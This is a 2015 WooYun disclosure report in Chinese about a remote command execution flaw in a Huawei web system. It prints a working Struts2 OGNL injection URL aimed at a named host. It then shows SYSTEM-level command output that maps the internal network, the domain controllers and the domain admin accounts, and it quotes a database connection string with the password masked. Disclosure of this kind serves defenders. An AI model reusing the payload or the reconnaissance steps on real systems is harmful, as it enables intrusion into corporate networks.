乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-27: 细节已通知厂商并且等待厂商处理中 2015-10-28: 厂商已经确认,细节仅向厂商公开 2015-11-07: 细节向核心白帽子及相关领域专家公开 2015-11-17: 细节向普通白帽子公开 2015-11-27: 细节向实习白帽子公开 2015-12-12: 细节向公众公开
华为某系统存在远程命令执行漏洞(可穿透边界防火墙进入生产网络 域环境)在域环境内,SYSTEM权限,可内网渗透,影响大,考虑了半天,还是写中文的利用域渗透技术http://zone.wooyun.org/content/23396
#1 漏洞服务器http://wdt-mx.huawei.com/sdtrp/project.actionhttp://119.145.15.78/sdtrp/project.action
#2 exphttp://wdt-mx.huawei.com
http://119.145.15.78/sdtrp/project.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
D:\WEB_Server\apache-tomcat-6.0.44\webapps\sdtrp\whoami
nt authority\system
ipconfig /allWindows IP Configuration Host Name . . . . . . . . . . . . : DGGWDTRP01-TGE Primary Dns Suffix . . . . . . . : china.huawei.com
arp -aInterface: 10.88.178.105 --- 0xc Internet Address Physical Address Type 10.88.178.1 00-00-5e-00-01-b2 dynamic 10.88.178.2 f8-4a-bf-5c-1d-0e dynamic 10.88.178.3 f8-4a-bf-5c-1b-fe dynamic 10.88.178.255 ff-ff-ff-ff-ff-ff static 224.0.0.22 01-00-5e-00-00-16 static 224.0.0.252 01-00-5e-00-00-fc static 239.255.255.250 01-00-5e-7f-ff-fa static Interface: 10.88.72.91 --- 0xe Internet Address Physical Address Type 10.88.72.1 00-00-5e-00-01-48 dynamic 10.88.72.2 f8-4a-bf-5c-1d-0d dynamic 10.88.72.3 f8-4a-bf-5c-1b-fd dynamic 10.88.72.5 00-25-9e-b0-db-44 dynamic 10.88.72.255 ff-ff-ff-ff-ff-ff static 224.0.0.22 01-00-5e-00-00-16 static 224.0.0.252 01-00-5e-00-00-fc static 239.255.255.250 01-00-5e-7f-ff-fa static
# 在域环境内,可内网渗透,影响非常大
net time /domainCurrent time at \\LGGAD41-DC.china.huawei.com is 2015/10/27 16:52:34
Pinging LGGAD39-DC.china.huawei.com [10.72.135.58] with 32 bytes of dataPinging uniportal.huawei.com [10.82.55.193] with 32 bytes of data:Pinging mail.huawei.com [10.72.61.76] with 32 bytes of data:
域环境内:光域控制器都几百台,几十万人不是盖的net group "Domain controllers" /domain
The request will be processed at a domain controller for domain china.huawei.com.Group name Domain ControllersComment óò?D?ùóDóò?????÷Members------------------------------------------------------------------------------- mask 区域 *****$ BLR**********$ BRA**********$ CGK**********$ DFW**********$ DGG**********$ DGG**********$ HGH**********$ HKG**********$ ISB**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LHR**********$ LOS**********$ MSC**********$ NKG**********$ NKG**********$ NKG**********$ NKG**********$ PEK**********$ RUH**********$ SIA**********$ SJC**********$ SZX**********$ SZX**********$ SZX**********D02-DC$ ***** YYZAD02-DC$ The command completed successfully.
*****$ BLR**********$ BRA**********$ CGK**********$ DFW**********$ DGG**********$ DGG**********$ HGH**********$ HKG**********$ ISB**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LGG**********$ LHR**********$ LOS**********$ MSC**********$ NKG**********$ NKG**********$ NKG**********$ NKG**********$ PEK**********$ RUH**********$ SIA**********$ SJC**********$ SZX**********$ SZX**********$ SZX**********D02-DC$ *****
YYZAD02-DC$ The command completed successfully.
The request will be processed at a domain controller for domain china.huawei.com.Group name IT-ITPL-DC-CD-wComment 云数据中心安全解决方案部Members------------------------------------------------------------------------------- mask 区域 ***** d00********** h00********** h00********** j00********** l00********** l00********** l00********** l00********** o00********** r90********** s00********** w00********** w00********** x00********** y00********** y90********** z00********** z00**********0359515 ***** The command completed successfully.
***** d00********** h00********** h00********** j00********** l00********** l00********** l00********** l00********** o00********** r90********** s00********** w00********** w00********** x00********** y00********** y90********** z00********** z00**********0359515 *****
The command completed successfully.
# 终极BOSS
The request will be processed at a domain controller for domain china.huawei.com.User name china-adminFull Name Comment 管理计算机(域)的内置帐户User's comment Country code 000 (System Default)Account active YesAccount expires NeverPassword last set 2015/10/17 16:04:55Password expires NeverPassword changeable 2015/10/17 16:04:55Password required YesUser may change password YesWorkstations allowed AllLogon script User profile Home directory Last logon NeverLogon hours allowed AllLocal Group Memberships *Administrators *MomAdministrators *X86-ADMIN1 *X86-ADMIN2 *X86-ADMIN3 Global Group memberships *MOMadmins *Domain Admins *Domain Users *Group Policy Creator The command completed successfully.
# 审计监控系统的数据库
var strADOConn="Provider=sqloledb;Data Source=szxmng02-nt.huawei.com;User ID=nt_task_monitor;Password=********;Network Library=dbmssocn";var oADOConn,oADOCommand,oADORecord;var strServer,strTask,strStatus,strADOCommand;var oArgs;var iAffected;
# 更新
危害等级:高
漏洞Rank:20
确认时间:2015-10-28 00:32
感谢猪猪侠提醒,已通知业务进行修复。
暂无
